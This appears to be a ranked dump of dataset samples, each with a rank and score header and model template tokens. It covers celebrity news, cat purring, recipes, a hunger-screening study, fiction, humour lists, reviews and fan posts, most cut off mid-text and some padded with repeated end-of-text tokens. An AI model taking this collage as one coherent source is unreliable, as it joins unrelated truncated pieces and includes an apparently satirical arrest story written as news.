in printed form, Keanu Reeves has used the uber popular "Sad Keanu" meme as inspiration for a book. + +"Sad Keanu" hit last summer courtesy of a glorious paparazzi photo and the folks over at Reddit. Strangely enough, it took Reeves until October to find out about his own memetastic existence. + +Still, he's apparently taking it all in good stride — in spite of the fact that he's had a rather hard life, jam-packed with things to be sad about (aside from Bill & Ted 3). + +The New York Daily News reports that Reeves is out with a very limited edition book called Ode to Happiness — 4,000 copies are being sold in the UK. The book, which really started off as a joke, basically features a lot of ink blots with sad sayings under them. Sample: "I draw a hot sorrow bath." + +"[I was listening to a radio station that] was playing, like, an orgy of depressing, self-pitying, nostalgic music," Reeves told the Daily News. "You know, 'I'm so lonely and I've been left and my heart is broken.' It was so voluptuously horrible. And I just started to write on this piece of paper, because I had this image of, you know, that moment when you take that bath, you light that candle, and you're really just kind of depressed. And it was making [my friend] laugh so hard." + +Reeves also apparently hopes to pen another book called Haikus of Hope. "Basically like, 'I want to kill myself', and go from there," he told the publication.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 60; Score = 847872.0 +<|begin_of_text|>Curling up with your favorite ball of fur as she purrs away is pretty close to heaven, at least for cat folk. Yet, hidden between those vibrations, that most appealing of domestic sounds remains wrapped in mystery, and even a little magic. + +No one is certain exactly why cats purr, though there are a number of good guesses. The obvious observation is cats seem to purr when they're pleased and feeling good. But that's not always the case: Some cats also purr when they're hungry, injured, or frightened. And most surprisingly, purring frequencies have been shown to stimulate bone regeneration—yes, bone regeneration. + +Cats purr by using their larynx and diaphragm muscles, both as they inhale and as they exhale, although just how the central nervous system generates and controls those contractions isn't yet understood. Early 19th century taxonomists thought cats could either purr or roar, and split the family Felidae along these lines—"purrers' (subfamily Felinae) and 'roarers' (subfamily Pantherinae). + +A cheetah. Getty Images + +Today, though, taxonomists believe most cats can purr, with a few probable (though not certain) pantherine exceptions: lion, leopard, jaguar, tiger, snow leopard and clouded leopard. (Cheetahs and cougars? Yeah, they purr.) + +So, why do it? If it's a form of communication, it's meant for those near and dear, since cats purr at a frequency and volume too low to travel far. Purring (and many other low-frequency vocalizations in mammals) often are associated with positive social situations: nursing, grooming, relaxing, being friendly. + +More likely, though, purring is simply soothing, or self-soothing, as cats may also purr in stressful situations. In that case, purring would be akin to how humans soothe themselves by crying, laughing, distracting themselves, or even organizing their desk. Some veterinarians and cat enthusiasts have observed cats lying alongside each other and purring when one is injured (a behavior termed "purr therapy"), though scientific literature on the subject is scant. + +Beyond being calming for the injured kitty, "purr therapy" may have bone healing properties. Domestic cats purr at a frequency of about 26 Hertz, in a range that promotes tissue regeneration. That's not as crazy as it sounds: High-impact exercise promotes bone health for +================================================================================ +Rank = 61; Score = 843776.0 +<|begin_of_text|>Jamaican recipes that will make you say... YAH MON! + +Can you say? "Hold the spice," Of course you can! These Jamaican Recipes will make you the talk of the town, neighborhood, school, social club, church, campsite...you know. + +You will impress your friends with these exotic recipes. + +Have you ever tried any of these recipes: Brown Stewed Fish, Escovitch Fish, Curry Chicken, Goat Meat, Rice & Peas, Seasoned Rice, Cabbage and Salt Fish, Cornmeal Porridge, Banana Porridge, Sorrell, Ginger Beer, Calaloo and Dumplings, Bulla? + +Or Plantain Tarts, Gizzarda, Top and Bottom, Asham, Beef Pattie and Coco Bread, Bun & Cheese, Toto, Jerk Chicken, Yam & Banana with Saltfish, Bully Beef & Bread, and Dutty Gal? + +Or Shad & Banana, Red Herring & Crackers, Mackerel & Banana...to rahtid, cuyah...eh...eh. a yahso it deh... YAH MON Oh! Sorry (I shall now switch to Her Majesty's English) I got carried away. + +Yes, it's easy to get carried away when talking/writing about these foods. I get the mouth-watering effect that makes me hungry. + +Some of the names of the foods mentioned in the above sentences may not sound familiar to you, but don’t worry…you’ll become an expert cook making these dishes in no time. + +Another thing not to worry about is how you pronounce the names of the food…if you don’t get it, big deal. Taste is what we are concerned about, not names. + +And if you meet a Mr. or Mrs. Brag & Boast know-it-all Jamaican cook, be nice to him/her, and try to get some of his/her cooking methods, believe me the knowledge wont hurt you. + +HOLD THE SPICE + +Over time, in our little restaurant in Atlanta, Georgia we have heard several people say they like the Jamaican food but it’s “too spicy.” That’s before they try anything on our menu…go figure. + +And to their surprise, after tasting a sample of our food, such as Stew Chicken or Oxtail, their expression was,"this is soooo good, can I have the recipe?" "mmm...Sure!" + +See, no need to hold the spice. Why? It isn’t hot and spicy at all. + +You can +================================================================================ +Rank = 62; Score = 843776.0 +<|begin_of_text|>Study finds that simple 2-question survey can better identify hungry children + +Asking parents just two simple screening questions could help health care providers and social workers to easily and quickly identify families whose young children are suffering from hunger, enabling early interventions that could prevent serious health consequences, according to a new study led by University of Maryland School of Medicine researchers. The study, published July 1 in the journal Pediatrics, analyzed data gathered from more than 30,000 families nationwide, about a quarter of whom suffered from hunger. The researchers examined whether the time-consuming, 18-question Household Food Security Survey provided by the federal government could be shortened and still be effective in identifying hungry families. They found that just the first two statements, with which families were asked to agree or disagree, were key: "Within the past 12 months we worried whether our food would run out before we got money to buy more;" and "Within the past 12 months the food we bought just didn't last and we didn't have money to get more." + +The researchers found that 92.5 percent of the hungry families answered "yes" to the first question, and 81.9 percent of the families answered yes to the second, meaning that positive answers to those questions alone could accurately identify most families affected by hunger. + +Such an efficient screening test can save time and get help to more hungry families faster, according to lead author Erin Hager, Ph.D., assistant professor of pediatrics at the University of Maryland School of Medicine. "This paper is the evidence that it works," Dr. Hager says. "Now, this can immediately be used by any social service agency or any clinic to more quickly get hungry children connected with the assistance they need to stay nourished, healthy and developmentally on track." + +Hunger can be invisible in American children because they do not physically appear skinny or emaciated, according to senior author Maureen Black, Ph.D., the John A. Scholl, M.D., and Mary Louise Scholl, M.D., Professor of Pediatrics at the University of Maryland School of Medicine. "Unlike hungry children in Third World countries who may go without food, American parents have access to cheap, nutrient-deprived foods they can use to fill their children's bellies and maintain their weight. However, without critical nutrients such as iron, babies and toddlers can suffer from serious health consequences." + +Health care professionals rarely ask parents if they have enough nutritious food to feed their families. "People who are hungry and who can't feed their kids are often +================================================================================ +Rank = 63; Score = 835584.0 +<|begin_of_text|>Good food, good eating, is all about blood and organs, cruelty and decay. It’s about sodium-loaded pork fat, stinky triple-cream cheeses, the tender thymus glands and distended livers of young animals. It’s about danger—risking the dark, bacterial forces of beef, chicken, cheese, and shellfish. Your first two hundred and seven Wellfleet oysters may transport you to a state of rapture, but your two hundred and eighth may send you to bed with the sweats, chills, and vomits. Gastronomy is the science of pain. Professional cooks belong to a secret society whose ancient rituals derive from the principles of stoicism in the face of humiliation, injury, fatigue, and the threat of illness. The members of a tight, well-greased kitchen staff are a lot like a submarine crew. Confined for most of their waking hours in hot, airless spaces, and ruled by despotic leaders, they often acquire the characteristics of the poor saps who were press-ganged into the royal navies of Napoleonic times—superstition, a contempt for outsiders, and a loyalty to no flag but their own. A good deal has changed since Orwell’s memoir of the months he spent as a dishwasher in “Down and Out in Paris and London.” Gas ranges and exhaust fans have gone a long way toward increasing the life span of the working culinarian. Nowadays, most aspiring cooks come into the business because they want to: they have chosen this life, studied for it. Today’s top chefs are like star athletes. They bounce from kitchen to kitchen—free agents in search of more money, more acclaim. I’ve been a chef in New York for more than ten years, and, for the decade before that, a dishwasher, a prep drone, a line cook, and a sous-chef. I came into the business when cooks still smoked on the line and wore headbands. A few years ago, I wasn’t surprised to hear rumors of a study of the nation’s prison population which reportedly found that the leading civilian occupation among inmates before they were put behind bars was “cook.” As most of us in the restaurant business know, there is a powerful strain of criminality in the industry, ranging from the dope-dealing busboy with beeper and cell phone to the restaurant owner who has two sets of accounting books. In fact, it was the unsavory side of professional cooking that attracted me to it in the first place. In +================================================================================ +Rank = 64; Score = 827392.0 +<|begin_of_text|>Example One: Alex has a PhD in Subjectology. Jamie knows that Alex has a PhD in Subjectology, yet, during a discussion of Subject, Jamie, who has an interest in and is reasonably knowledgeable about Subject, condescendingly explains basics of Subject to Alex without regard for Alex's demonstrable proficiency. Alex expresses that Jamie's insistence on explaining basics makes Alex feel as though Jamie does not respect Alex's competency or intellectual capacity. Jamie, whose intent was actually to impress Alex, insists that hir intent was not to make Alex feel that way. Alex makes a valiant attempt to explain why Jamie behaving as though Alex doesn't know the basics of Alex's professional field is disrespectful, at which point Jamie gets miffed, reiterates that the intent was not to make Alex feel bad, accuses Alex of looking for things to get mad about, and misrepresents Alex's good faith attempt to address demeaning language as a personal attack on Jamie. + +Thus, what had started out as an inadvertent slight becomes a harmful exchange, as Jamie refuses to acknowledge that the effect of the action irrespective of its intent was hurtful to Alex, and deflects accountability by casting Alex as unreasonable. + +Example Two: Kelly and Terry are friends. Kelly is fat; Terry is thin. Terry routinely expresses disgust with hir body by saying things like, "I am so fat" and "This cellulite is disgusting." Kelly tells Terry that such expressions are hurtful and make hir wonder what Terry must think of hir, since zie is much fatter than Terry. Terry, whose intent was actually to solicit support and validation from Kelly, insists that hir intent was not to make Kelly feel that way. Kelly makes a valiant attempt to point out that even if it was not intended to make hir feel bad about hir body, it does, because Terry is associating fatness with something bad. Terry reacts defensively, reiterating that the intent was not to make Kelly feel bad and accusing Kelly of being jealous and oversensitive. + +Thus, what had started out as a misguided attempt to connect becomes a harmful exchange, as Terry refuses to acknowledge that, despite a lack of intention to be hurtful, zie was hurtful nonetheless, and deflects accountability by projecting hir void of sensitivity onto Kelly as an abundance of oversensitivity. + +Example Three: Jesse has a habit of casually using the rhetoric of sexual violence ("I got raped by that ATM fee"), even around hir friend Jordan, who was raped. Jordan has asked Jesse not +================================================================================ +Rank = 65; Score = 823296.0 +<|begin_of_text|>He was still holding the perfectly-wrapped present. The glossy smiling row of Santas beaming happily from the red and green paper at him. He studied their identical faces, looking for any sort of imperfection that could distinguish them from each other. A pointless task but he wasn’t prepared to look up at Marge yet. He wondered if she would have actually liked the small golden ring he had bought her, the one with little green Colombian emerald that cost him a small fortune. ‘It’s perfect,’ he remembered thinking when he chanced upon it a couple of months earlier whilst browsing idly in a second-hand shop. And now he was holding it in his hands, wrapped in the special Christmas paper that they had bought together a few days before to wrap the gifts of those friends they didn’t really liked who lived down the road. A joke he thought she’d appreciate. How irrelevant it seemed now. + +‘Are you not going to say anything? He heard Marge saying and he suddenly became aware of the Christmas lights wrapped around the tree next to him. ‘Will you marry me?’ he remembered practising in front of the mirror that morning. He didn’t want to ruin a moment they’ve both been waiting for for over 5 years. He smiled as he remembered his ruddy reflection in the mirror. ‘I’ve called Michael already,’ Marge went on, ‘he’s picking me up in 5 minutes.’ + +She stood up quickly, dropping the Christmas crackers she’d had on her lap. ‘I’m really sorry about this, Peter,’ she hesitated, ‘I just can’t do it anymore.’ He heard her steps as she walked away. He picked up one of the crackers and in search of another pointless task, he pulled it. The paper-thin hat, a miniature bowling set and the joke all fell to the ground. He picked up the hat and the joke. He looked toward the door where Marge was crying and pulling her coat on. Looking down, he read the joke. ‘What question can you never answer yes to? Are you asleep?’ The front door slammed closed. He could feel a tear forming in the corner of his eye and he dropped the joke and the wrapped present on the floor. He didn’t want to look up so he put his cracker hat on and softly muttered goodbye. + +Advertisements<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 66; Score = 819200.0 +<|begin_of_text|>In Julian Barnes’s novel Staring at the Sun, teenage Jean Serjeant is struck by the firmness of her parents’ moral views. Their opinions seem to her like ‘honking frogs’ compared with her own ‘twitching, vulnerable tadpoles’. How can people be so sure of what they think, Jean wonders: ‘How could you know your own mind without using your mind to discover your mind in the first place?’ It seems almost circular, putting Jean in mind of ‘a dog circling in pursuit of its own cropped tail’.[1] + +Jean’s questions provoke further questions. How do we discover what we think? If we must use our minds to discover our minds, then can we make mistakes about them? Can you be wrong about what you think, just as you can be wrong about what somebody else thinks? I express liberal views on most political and social issues, but can I be sure I really believe the things I say? Perhaps I just say them to fit in and get my friends’ approval? + +The suggestion that we might make mistakes about our own minds runs against common sense. We assume that our minds are, as it were, transparent to us -- that we can tell what’s in them directly and infallibly. Yet there are reasons to doubt that common sense is right about this. It is possible to have a thought without knowing that you have it. Infants and non-human animals have beliefs (for example, that Daddy is close by or that there is food on the table), without knowing that they have them. They have beliefs but do not have beliefs about their beliefs. Some further process is required (some ‘use of the mind’) to gain that self-knowledge, and the process might not always be reliable. Moreover, there is experimental evidence that we do in fact make mistakes about our own minds. It is well established that people’s choices can be influenced by factors of which they are not consciously aware. For example, if offered a choice of identical items, people tend to opt for the one furthest to the right. But if asked why they chose this item, they do not mention its position but offer some plausible reason, such as that they thought it was the best quality. Similar effects have been observed in other experimental situations. It seems that when people do not know why they performed an action, they unconsciously confabulate an explanation for it, attributing to themselves mental states they do not really have.[2] + +So how then do we get to know about our own +================================================================================ +Rank = 67; Score = 819200.0 +<|begin_of_text|>Research Miscellaneous + +You know you’ve been in Sweden too long, when... It's acceptable to eat lunch at 11.00. You think Leif 'Loket' Olsson is entertaining. You rummage through your plastic bag collection to see which ones you should keep to take to the store and which can be sacrificed to garbage. You associate pea soup with Thursday. The first thing you do on entering a bank/post office/pharmacy etc. is look for the queue number machine. You accept that you will have to queue to take a queue number. A sharp intake of breath has become part of your vocabulary, as has the sound 'ahh'. You associate Friday afternoon with a trip to system bolaget. You think nothing of paying $50 for a bottle of 'cheap' spirits at system bolaget. Silence is fun. Your native language has seriously deteriorated; you begin to "eat medicine" and "hire videos". Your front door step is beginning to resemble a shoe shop. When a stranger on the street smiles at you, you assume that: + +a. he is drunk; + +b. he is insane; + +c. he is American; + +d. he is all of the above. You stay home on Saturday night to watch Bingolotto. It seems sensible that the age limit at Stockholm night clubs is 23 or 25. The reason you take the ferry to Finland is: + +a. duty free vodka + +b. duty free beer + +c. to party The only reason for getting of the boat in Helsinki is to eat pizza. It no longer seems excessive to spend $200 on alcohol in a single night. The fact that all of the "v's" and the "w's" are together in the phone directory seems right. You care who wins 'Expedition: Robinson'. Your old habit of being "fashionably late" is no longer acceptable. You are always on time. You no longer see any problem wearing white socks with loafers. You know that "religious holiday" means "let's get pissed." You are no longer scared of volvos and volvo drivers. You have your own innebandy club. You enjoy the taste of surstr�mming. You find yourself debating the politics of Carl Bildt. You use mmmm as a conversation filler. An outside temperature of 9 degrees Celsius is mild. When someone asks for "three cheers", you say "hoorah, hoorah, hoorah, hoorah". You wear sandals with socks +================================================================================ +Rank = 68; Score = 815104.0 +<|begin_of_text|>Music Humor - Rules Of The Blues + +back to Music Humor Page + +Author unkown. (Wish we knew, 'cause it's really funny) + +1. Most Blues begin, "Woke up this morning..." + +2. "I got a good woman" is a bad way to begin the Blues, unless you stick something nasty in the next line like, "I got a good woman, with the meanest face in town." + +3. The Blues is simple. After you get the first line right, repeat it. Then find something that rhymes... sort of: "Got a good woman with the meanest face in town. Yes, I got a good woman with the meanest face in town. Got teeth like Margaret Thatcher, and she weigh 500 pound." + +4. The Blues is not about choice. You stuck in a ditch, you stuck in a ditch--ain't no way out. + +5. Blues cars: Chevys, Fords, Cadillacs and broken-down trucks. Blues don't travel in Volvos, BMWs, or Sport Utility Vehicles. Most Blues transportation is a Greyhound bus or a southbound train. Jet aircraft and company motor pools ain't even in the running. Walkin' plays a major part in the blues lifestyle. So does fixin' to die. + +6. Teenagers can't sing the Blues. They ain't fixin' to die yet. Adults sing the Blues. In Blues, "adulthood" means being old enough to get the electric chair if you shoot a man in Memphis. + +7. Blues can take place in New York City but not in Hawaii or any place in Canada. Hard times in Minneapolis or Seattle is probably just clinical depression. Chicago, St. Louis, and Kansas City are still the best places to have the Blues. You cannot have the blues in any place that don't get rain. + +8. A man with male pattern baldness ain't the blues. A woman with male pattern baldness is. Breaking your leg cause you were skiing is not the blues. Breaking your leg 'cause a alligator be chompin' on it is. + +9. You can't have no Blues in a office or a shopping mall. The lighting is wrong. Go outside to the parking lot or sit by the dumpster. + +10. Good places for the Blues: + +a. Highway + +b. Jailhouse + +c. An empty bed + +d. Bottom of a whiskey glass + +11. Bad places for the Blues: + +a. Nord +================================================================================ +Rank = 69; Score = 815104.0 +<|begin_of_text|>Get the biggest football stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email + +Derek Llambias sums up Newcastle's last two decades with a devastating critique that gets to the heart of why manager Alan Pardew has been awarded a stunning new eight-year contract. + +"You look at the last 25 years at Newcastle and it has only known drama, from the highs to the lows," said Llambias, the St James' Park outfit's managing director. + +"They worked on those glory transfers and all the dramas behind them - glory and bust, with no success. + +"What was the success? It was basically. 'I've signed a player!' + +"That has to end. + +"It has." + +Rewind to the bombshell of Newcastle's relegation in May 2009, and Llambias is equally forthright: + +"Three years ago, it felt like the world was falling apart. How do you think we felt? Awful. + +"[Owner] Mike Ashley and I had to sit down and be very honest about how we could turn it around, the mistakes made. + +"We needed stability. And now we're getting there, but we can't stand still. + +"You can't keep changing your manager if he has a bad run - it doesn't make any sense at all. We just want to break that mould in football. Eight years... this is where we've got to be." + +While the football world was digesting, with an element of shock, the bold move to hand Pardew the clout of almost a decade in charge to shape a trophy-winning team, Llambias was explaining why it was a natural step. + +Newcastle want to end years of upheaval, the spread of insecurity at the slightest run of bad results, and terrace gossip that infects many a coach's reign when the going gets tough. + +The deal is reward for a surprise fifth place last season, but also because owner Mike Ashley is "in it for the long term" and has found a manager in Pardew he can trust and work with, but still have a sparky, challenging relationship with. + +Off the pitch, the club is close to self-sufficiency. Financially stable. + +Newcastle want stability on the pitch, too. + +Yes, stability - not a word often associated with the Magpies. + +The 2020 vision - for that is the year Pardew and co are now contracted until - includes nurturing a first XI depicted +================================================================================ +Rank = 70; Score = 811008.0 +<|begin_of_text|>In one of the stranger news stories to surface in recent weeks, a 23 year old male was arrested in the central region of Los Angeles yesterday, charged with trespassing and attempted battery on Hollywood boulevard. The man, now known as Thomas Hamond, was found on the rooftops of several stores, wielding a bow and arrow. With emergency services having been called and concerned for his welfare the nearby area was evacuated. + +Hamond was found to be wielding a bow and arrow at the scene, repeatedly shouting “Ryuu ga waga teki wo kurau!”. When officers tried to talk to the trespasser, he would only respond with “I am ready to unleash the dragon!” before firing arrows into the air. + +The location where the incident occured + +Fortunately for the those involved it transpired that the bow and arrow Hamond was using was a children's toy. “I’ve never seen anything like it. Not only was he naked with aluminum foil wrapped around his legs, but he’s firing toy arrows at us. I can’t pull some of them off my vehicle they’ve stuck so tight.” + +Officer Schwimpy, who was first responder, went on to detail how he and his fellow officers were unable to open a dialogue with Hamond. “He just kept shouting Ryuu ga waga...something. I haven’t a clue what it means. He wouldn’t listen and kept talking about a dragon and moving a payload." + +Local residents who were seen to be cheering on Hamond as he fired from the rooftops, were keen to support him. “I was sat drinking my mocha-choca-latte and looked up, and there’s this guy firing arrows down at the cops. Everyone dived for cover until they saw the rubber ends.” said one passerby. + +Police released this image of the offending bow and arrow. + +Hamond was eventually apprehended after local police cornered him on one of the rooftops. While being detained it is reported that he continually shouted “The dragon stirs within me!” and requested that officers be careful of his legs. Although there’s no additional information as to what prompted Hamond to behave as he did, relatives had become concerned about the amount of time he had been spending on his computer. + +“He never shuts up about a girl called Mei. We think he’s got himself a girlfriend. We’re pleased but he never brings her home and now all this mess.” stated Hamond’s Mom, Linda. + +Although there’s no further statement from the Los Angeles Police Department, our +================================================================================ +Rank = 71; Score = 806912.0 +<|begin_of_text|>I feel like my arm is all warmed up and I don’t have a game to pitch. I was primed to review "Atlas Shrugged." I figured it might provide a parable of Ayn Rand’s philosophy that I could discuss. For me, that philosophy reduces itself to: "I’m on board; pull up the lifeline." There are however people who take Ayn Rand even more seriously than comic-book fans take "Watchmen." I expect to receive learned and sarcastic lectures on the pathetic failings of my review. + +And now I am faced with this movie, the most anticlimactic non-event since Geraldo Rivera broke into Al Capone’s vault. I suspect only someone very familiar with Rand’s 1957 novel could understand the film at all, and I doubt they will be happy with it. For the rest of us, it involves a series of business meetings in luxurious retro leather-and-brass board rooms and offices, and restaurants and bedrooms that look borrowed from a hotel no doubt known as the Robber Baron Arms. + +Advertisement + +During these meetings, everybody drinks. More wine is poured and sipped in this film than at a convention of oenophiliacs. There are conversations in English after which I sometimes found myself asking, "What did they just say?" The dialogue seems to have been ripped throbbing with passion from the pages of Investors’ Business Daily. Much of the excitement centers on the tensile strength of steel. + +The story involves Dagny Taggart (Taylor Schilling), a young woman who controls a railroad company named Taggart Transcontinental (its motto: "Ocean to Ocean"). She is a fearless and visionary entrepreneur, who is determined to use a revolutionary new steel to repair her train tracks. Vast forces seem to conspire against her. + +It’s a few years in the future. America has become a state in which mediocrity is the goal, and high-achieving individuals the enemy. Laws have been passed prohibiting companies from owning other companies. Dagny’s new steel, which is produced by her sometime lover, Hank Rearden (Grant Bowler), has been legislated against because it’s better than other steels. The Union of Railroad Engineers has decided it will not operate Dagny’s trains. Just to show you how bad things have become, a government minister announces "a tax will be applied to the state of Colorado, in order to equalize our national economy." So you see how governments and unions are the enemy of visionary entrepreneurs. + +But +================================================================================ +Rank = 72; Score = 802816.0 +<|begin_of_text|>CHAPTER 12 – "ARGENTINA" + +Aaahhh, I'm at 12 chapters already! For my first HIMYM fanfic ever! Big hugs and thanks to everyone who's been reading; those amazing reviews are what's been keeping me writing more! I am so glad people are enjoying this; I'm having a blast writing it! I hope you'll like this latest update…and have a great day! + +2015 + +(Ted, Tracy, Marshall and Lily are at the bar. Lily is on the phone, crying.) + +Future Ted (VO): Kids, in the summer of 2015, your mother, the whole gang and I hopped on to a plane to Argentina just hours after we found out your Aunt Robin was sick. + +Argentina + +(Barney is in the waiting rooms in the hospital just outside Robin's room when Ted, Tracy, Marshall and Lily are walking in looking sad.) + +Future Ted (VO): You Uncle Barney, as expected, was acting a little…weird. + +Barney: (loudly, excited) Hey, guys! + +(They all stare at him, confused.) + +Lily: Barney, oh my god! (runs up to him and hugs him) How've you been? + +Barney: Great! How've you been? The boobs are getting bigger, bra-vo, Lily. (gives her a thumb-up) + +Lily: (hits him) What-what is wrong with you?! + +Marshall: Seriously, bro. I mean, there's no wrong time to mention Lily-boobs but…c'mon, bro. + +Barney: (excited) I am serious! Argentina is ah-mazing, guys! Let's go sightseeing, come on! + +Ted: (stops him) Barney! We're here to see you and Robin. This isn't some vacation. + +Barney: Why can't it be both? + +Tracy: Where is Robin, and I'm gonna be the only one of us with literal balls to ask you, are you high? + +Barney: Robin's great! She's sleeping now so we can't really see her right now and I mean, she's not really great. I mean, it's cancer so it can't be really great, am I right fellas? (chuckles) But she's great. We're great. I am…you know… (looks up, confused) what's the word? + +Marshall: Great? + +Barney: YES! Thank you, Judge Fudge! + +(Marshall +================================================================================ +Rank = 73; Score = 802816.0 +<|begin_of_text|>View Full Version : [Anime] Episode 51:... + +The Small One Okay, here a very short summary of what happened in the last episode: + +Al stands up and walks to Ed, he claps his hands and the whole room becomes full of transmutation circles. + +Mustang is loosing to the Führer, when the son appears with the thing from the save. The Führer gets angry and chokes his son. Mustang intervenes, he takes a skull from the bag of the son and kills the Führer. + +On his way out, Archer is standing in his way. Hawkeye kills Archer. + +Ed is standing in a nothingness. Al appears before him, but vanishes. Then Envy appears and wonders where he is. Ed answers they are standing before the gate. Envy asks where it leads to, and after he hears that Hohenheim is on the other side, he opens the gate and goes inside. + +Ed awakes with a perfect body and Al is nowhere to see. + +Dante is escaping in the Elevator, when mindless-Gluttony eats itself through the bottom... he looks very hungry. Dante claps her hands... when the Elevator arrives its empty. + +After telling Roze to excape and take Wrath with her, Ed does some transmutation on himself. + +Result: + +Al in his old body with no memory of what happened. + +Mustang lost his left eye. + +Hohenheim and Ed (with Automail again) are living together in München (1921). + +Wrath with Automail is living on the steets. + +Tucker with his lifeless Nina is practicing to draw Soul-Transmutation Circles on a wall. + +In the End both AL and Ed are sitting in a train and talking to themselves that they will meet again. + +huh so the movie will focus on Al and ed than??? :confused: + +Hoshi I have a question: + +and Winry? + +She rest in Resembool??? + +Pai Ed and Al separated? :sad: BTW It seems a very good end. But.. Too many months to the movie DAMN + +michiru Umm....In short....... + +Ed---to this world.Alive. + +Al---revived but lost memories for 4 years. + +Roy---got his left eye injured.Alive. + +Hawkeye---LOVE LOVE with Roy(lol).Alive. + +Roze---Alive. + +Wrath---Full metal Wrath!?Alive but disappeared. + +Dante---was eaten by Gluttony +================================================================================ +Rank = 74; Score = 798720.0 +<|begin_of_text|>Unfortunately for lovers of fantasy epics, hairy feet and stories where dwarves are packed into barrels, Guillermo Del Toro has announced that he's not going to direct the movie version of The Hobbit after all. + +This is tragic. Upon leaving the theater after seeing The Return of the King for the first time, I imagine everyone was thinking the same thing: "Man, that was a freakingly long ending." But after that they thought, "I can't wait to see The Hobbit." It seemed inevitable, and if Peter Jackson wasn't going to direct it, then Del Toro was arguably the best alternative. + +And now Del Toro has left the project. While the movie isn't cancelled, it's wandering aimlessly without a captain, like an abandoned ship or a poorly organized volleyball team. Where will we find a director capable of bringing J.R.R. Tolkien's vision to life? Let's consider the possibilities. What would happen if one of these well-known directors were hired to helm The Hobbit? + +Tim Burton ———- + +Tim Burton's grasp of magic and high weirdness is initially encouraging to fans, but doubt sets in when Johnny Depp is brought on to play Gandalf and decides to base his portrayal on eccentric celebrity Ozzy Osbourne. When Helena Bonham Carter is tapped to play Gollum, hopes take a dive, and the final product is praised for its bold use of color and shapes, but criticized for introducing a 10-minute dream sequence in which Bilbo is chased by a giant ring in a clown suit. + +Terry Gilliam ————- + +The first stills to come out of the production are very promising, but Terry Gilliam's famed bad luck comes into play when, over the course of a single week, a fire destroys the Smaug set, a flash flood wipes out Lake Town, Thorin Oakenshield develops spasmodic dysphonia, and the special-effects budget is cut to about half that of Big Momma's House 3. The movie as released, while flawed and a commercial failure, nonetheless becomes a cult favorite among film students and fisheye lens salesmen. + +George Lucas ———— + +George Lucas decides that this Lord of the Rings prequel is lacking a certain something, and changes the plot to be about Sauron's early life as an adorable toddler caught in the middle of a continent-spanning dispute over water rights. Also, Sauron's best friend is an orc with an exaggerated Mexican accent named Boopily Boodily Moop +================================================================================ +Rank = 75; Score = 790528.0 +<|begin_of_text|>Picture a suburban housewife of the 1950s. Her name is Mrs. John Drone (Mary), and she lives in Rolling Knolls Estates, a new development of what the salesman calls "California Cape Cod Ramblers" on the outskirts of Washington, D.C. Whatever knolls might have rolled gently over the land at one time have been flattened for muddy streets of two-bedroom houses, named after famous conflicts of World War II. + +One rainy morning on Bataan Boulevard, Mary hangs her washing on a clothesline in the living room and knocks her shin on her son’s tricycle. Pain shoots up her leg and she bursts into tears. Then the front door blows open, and she starts shouting: + +‘Watch out, can’t you see the wash is up? You’re getting the wash all dirty.’ Mary very nearly screamed. ‘I’m sorry dear,’ a familiar, monotonous voice said. ‘Oh, it’s you,’ Mary said. And it was. John Drone, master of all he surveyed, had returned to his castle and to the bosom of his admiring family. He closed the door. + +Mary and John are the unfortunate (fictional) protagonists of The Crack in the Picture Window, published in 